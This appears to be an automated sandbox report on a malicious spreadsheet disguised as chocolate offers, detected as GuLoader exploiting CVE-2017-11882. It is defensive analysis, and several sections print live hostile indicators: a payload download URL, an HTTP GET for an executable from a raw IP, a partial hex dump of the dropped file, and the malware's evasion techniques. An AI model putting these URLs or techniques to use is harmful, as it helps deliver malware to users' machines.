Play interactive tour

Edit tour

Windows Analysis Report MILKA CHOCO COW BISCUITS AND CADBURY OFFERS,TWIX,SNICKERS,BOUNTY,GALAXY.xlsx

Overview

General Information

Sample Name:	MILKA CHOCO COW BISCUITS AND CADBURY OFFERS,TWIX,SNICKERS,BOUNTY,GALAXY.xlsx
Analysis ID:	452495
MD5:	b7cdda847140697b7bb7866b06d2a225
SHA1:	874d1157c6e65813383c6b4bffd4d48948993c88
SHA256:	1e7447cb7adb3336fcf6d2837781a2ab0d9f9fd3060cde3a47293bd34a883cdb
Tags:	VelvetSweatshopxlsx
Infos:
Most interesting Screenshot:

Detection

GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Multi AV Scanner detection for dropped file

Sigma detected: Droppers Exploiting CVE-2017-11882

Sigma detected: EQNEDT32.EXE connecting to internet

Sigma detected: File Dropped By EQNEDT32EXE

Yara detected GuLoader

C2 URLs / IPs found in malware configuration

Contains functionality to detect hardware virtualization (CPUID execution measurement)

Detected RDTSC dummy instruction sequence (likely for instruction hammering)

Drops PE files to the user root directory

Office equation editor drops PE file

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Sigma detected: Execution from Suspicious Folder

Tries to detect virtualization through RDTSC time measurements

Abnormal high CPU Usage

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to call native functions

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Document misses a certain OLE stream usually present in this Microsoft Office document type

Downloads executable code via HTTP

Drops PE files

Drops PE files to the user directory

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Office Equation Editor has been started

PE file contains strange resources

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w7x64

EXCEL.EXE (PID: 2368 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)

EQNEDT32.EXE (PID: 2124 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

vbc.exe (PID: 2192 cmdline: 'C:\Users\Public\vbc.exe' MD5: C937FC9ED4325E6AB24D49A3175F3A5C)

cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "https://kinmirai.org/wp-content/bin_inUIdCgQk163.bin"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000006.00000002.2388759813.00000000002E0000.00000040.00000001.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security

Sigma Overview

Exploits:

Sigma detected: EQNEDT32.EXE connecting to internet

Show sources

Source: Network Connection

Author: Joe Security: Data: DestinationIp: 180.214.239.39, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2124, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167

Sigma detected: File Dropped By EQNEDT32EXE

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2124, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882

Show sources

Source: Process started

Author: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2124, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2192

Sigma detected: Execution from Suspicious Folder

Show sources

Source: Process started

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus detection for URL or domain

Show sources

Source: http://180.214.239.39/process/.svchost.exe

Avira URL Cloud: Label: malware

Found malware configuration

Show sources

Source: 00000006.00000002.2388759813.00000000002E0000.00000040.00000001.sdmp

Malware Configuration Extractor: GuLoader {"Payload URL": "https://kinmirai.org/wp-content/bin_inUIdCgQk163.bin"}

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe	ReversingLabs: Detection: 42%
Source: C:\Users\Public\vbc.exe	ReversingLabs: Detection: 42%

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe			Jump to behavior

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:

Binary string: C:\Program Files (x86)\Administrator-Cloud\Projects\Interrup.pdb source: .svchost[1].exe.4.dr

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 180.214.239.39:80

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 180.214.239.39:80

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: https://kinmirai.org/wp-content/bin_inUIdCgQk163.bin

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 22 Jul 2021 11:50:59 GMTServer: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28Last-Modified: Wed, 21 Jul 2021 22:37:17 GMTETag: "3c468-5c7a9d0090119"Accept-Ranges: bytesContent-Length: 246888Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c7 bf 79 da 83 de 17 89 83 de 17 89 83 de 17 89 00 c2 19 89 82 de 17 89 cc fc 1e 89 87 de 17 89 b5 f8 1a 89 82 de 17 89 52 69 63 68 83 de 17 89 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 82 b6 5c 53 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 30 03 00 00 70 00 00 00 00 00 00 30 13 00 00 00 10 00 00 00 40 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 07 00 00 00 04 00 00 00 00 00 00 00 00 b0 03 00 00 10 00 00 19 f9 03 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 74 30 03 00 28 00 00 00 00 50 03 00 c4 54 00 00 00 00 00 00 00 00 00 00 58 b0 03 00 10 14 00 00 00 00 00 00 00 00 00 00 00 11 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 f8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c0 24 03 00 00 10 00 00 00 30 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 90 0b 00 00 00 40 03 00 00 10 00 00 00 40 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 c4 54 00 00 00 50 03 00 00 60 00 00 00 50 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 c3 1f b0 49 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0

Source: Joe Sandbox View

IP Address: 180.214.239.39 180.214.239.39

Source: Joe Sandbox View

ASN Name: VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN

Source: global traffic

HTTP traffic detected: GET /process/.svchost.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 180.214.239.39Connection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F70A7842.emf

Jump to behavior

Source: global traffic

Source: .svchost[1].exe.4.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: .svchost[1].exe.4.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: .svchost[1].exe.4.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: .svchost[1].exe.4.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: .svchost[1].exe.4.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: .svchost[1].exe.4.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: .svchost[1].exe.4.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: .svchost[1].exe.4.dr	String found in binary or memory: http://ocsp.digicert.com0O
Source: F70A7842.emf.0.dr	String found in binary or memory: http://www.day.com/dam/1.0
Source: .svchost[1].exe.4.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: .svchost[1].exe.4.dr	String found in binary or memory: https://www.digicert.com/CPS0

System Summary:

Office equation editor drops PE file

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe			Jump to dropped file

Source: C:\Users\Public\vbc.exe

Process Stats: CPU usage > 98%

Source: C:\Users\Public\vbc.exe	Memory allocated: 76E20000 page execute and read and write			Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76D20000 page execute and read and write			Jump to behavior

Source: C:\Users\Public\vbc.exe	Code function: 6_2_002E543B NtAllocateVirtualMemory,		6_2_002E543B
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002E5540 NtAllocateVirtualMemory,		6_2_002E5540

Source: C:\Users\Public\vbc.exe	Code function: 6_2_002E543B	6_2_002E543B
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002E2C2A	6_2_002E2C2A
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002E8C36	6_2_002E8C36
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002E841E	6_2_002E841E
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002E4860	6_2_002E4860
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002E7077	6_2_002E7077
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002E0C4C	6_2_002E0C4C
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002E8C42	6_2_002E8C42
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002E0C54	6_2_002E0C54
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002E2455	6_2_002E2455
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002E80A4	6_2_002E80A4
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002E28A0	6_2_002E28A0
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002E048D	6_2_002E048D
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002E0889	6_2_002E0889
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002E80EF	6_2_002E80EF
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002E48E9	6_2_002E48E9
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002E80C6	6_2_002E80C6
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002E0CC3	6_2_002E0CC3
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002E38D1	6_2_002E38D1
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002E3D2C	6_2_002E3D2C
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002E7D3E	6_2_002E7D3E
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002E5908	6_2_002E5908
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002E7D06	6_2_002E7D06
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002E4105	6_2_002E4105
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002E2518	6_2_002E2518
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002E0916	6_2_002E0916
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002E4912	6_2_002E4912
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002E517E	6_2_002E517E
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002E0147	6_2_002E0147
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002E5D43	6_2_002E5D43
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002E15BD	6_2_002E15BD
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002E05B1	6_2_002E05B1
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002E3D84	6_2_002E3D84
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002E322C	6_2_002E322C
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002E2228	6_2_002E2228
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002E1A21	6_2_002E1A21
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002E163B	6_2_002E163B
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002E421B	6_2_002E421B
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002E3A18	6_2_002E3A18
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002E3A69	6_2_002E3A69
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002E1A78	6_2_002E1A78
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002E3259	6_2_002E3259
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002E3684	6_2_002E3684
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002E42C0	6_2_002E42C0
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002E3ED8	6_2_002E3ED8
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002E832E	6_2_002E832E
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002E3325	6_2_002E3325
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002E6B35	6_2_002E6B35
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002E770F	6_2_002E770F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002E4712	6_2_002E4712
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002E6B7B	6_2_002E6B7B
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002E2379	6_2_002E2379
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002E7F4E	6_2_002E7F4E
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002E475F	6_2_002E475F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002E6FAF	6_2_002E6FAF
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002E27A4	6_2_002E27A4
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002E7BA4	6_2_002E7BA4
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002E47A2	6_2_002E47A2
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002E87BC	6_2_002E87BC
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002E23FF	6_2_002E23FF
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002E47C8	6_2_002E47C8
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002E0BDC	6_2_002E0BDC

Source: MILKA CHOCO COW BISCUITS AND CADBURY OFFERS,TWIX,SNICKERS,BOUNTY,GALAXY.xlsx

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Source: .svchost[1].exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: .svchost[1].exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: .svchost[1].exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLSX@4/13@0/1

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$MILKA CHOCO COW BISCUITS AND CADBURY OFFERS,TWIX,SNICKERS,BOUNTY,GALAXY.xlsx

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVR164D.tmp

Jump to behavior

Source: C:\Users\Public\vbc.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\Public\vbc.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: MILKA CHOCO COW BISCUITS AND CADBURY OFFERS,TWIX,SNICKERS,BOUNTY,GALAXY.xlsx

Static file information: File size 1267200 > 1048576

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:

Binary string: C:\Program Files (x86)\Administrator-Cloud\Projects\Interrup.pdb source: .svchost[1].exe.4.dr

Source: MILKA CHOCO COW BISCUITS AND CADBURY OFFERS,TWIX,SNICKERS,BOUNTY,GALAXY.xlsx

Initial sample: OLE indicators vbamacros = False

Source: MILKA CHOCO COW BISCUITS AND CADBURY OFFERS,TWIX,SNICKERS,BOUNTY,GALAXY.xlsx

Initial sample: OLE indicators encrypted = True

Data Obfuscation:

Yara detected GuLoader

Show sources

Source: Yara match

File source: 00000006.00000002.2388759813.00000000002E0000.00000040.00000001.sdmp, type: MEMORY

Source: C:\Users\Public\vbc.exe	Code function: 6_2_002212F5 push edx; ret	6_2_00221321
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00221023 push edx; ret	6_2_00221051
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00222823 push edx; ret	6_2_00222851
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00224023 push edx; ret	6_2_00224051
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00227024 push edx; ret	6_2_00227051
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00225825 push edx; ret	6_2_00225851
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00224833 push edx; ret	6_2_00224861
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00223033 push edx; ret	6_2_00223061
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00221833 push edx; ret	6_2_00221861
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00226034 push edx; ret	6_2_00226061
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00220038 push edx; ret	6_2_00220061
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00224803 push edx; ret	6_2_00224831
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00223003 push edx; ret	6_2_00223031
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00221803 push edx; ret	6_2_00221831
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00226004 push edx; ret	6_2_00226031
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00220008 push edx; ret	6_2_00220031
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00223813 push edx; ret	6_2_00223841
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00225013 push edx; ret	6_2_00225041
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00222014 push edx; ret	6_2_00222041
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00226814 push edx; ret	6_2_00226841
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00220818 push edx; ret	6_2_00220841
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00223063 push edx; ret	6_2_00223091
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00221863 push edx; ret	6_2_00221891
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00224863 push edx; ret	6_2_00224891
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00226065 push edx; ret	6_2_00226091
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00220068 push edx; ret	6_2_00220091
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00222074 push edx; ret	6_2_002220A1
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00223874 push edx; ret	6_2_002238A1
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00225074 push edx; ret	6_2_002250A1
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00226875 push edx; ret	6_2_002268A1
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00220878 push edx; ret	6_2_002208A1

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe			Jump to dropped file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
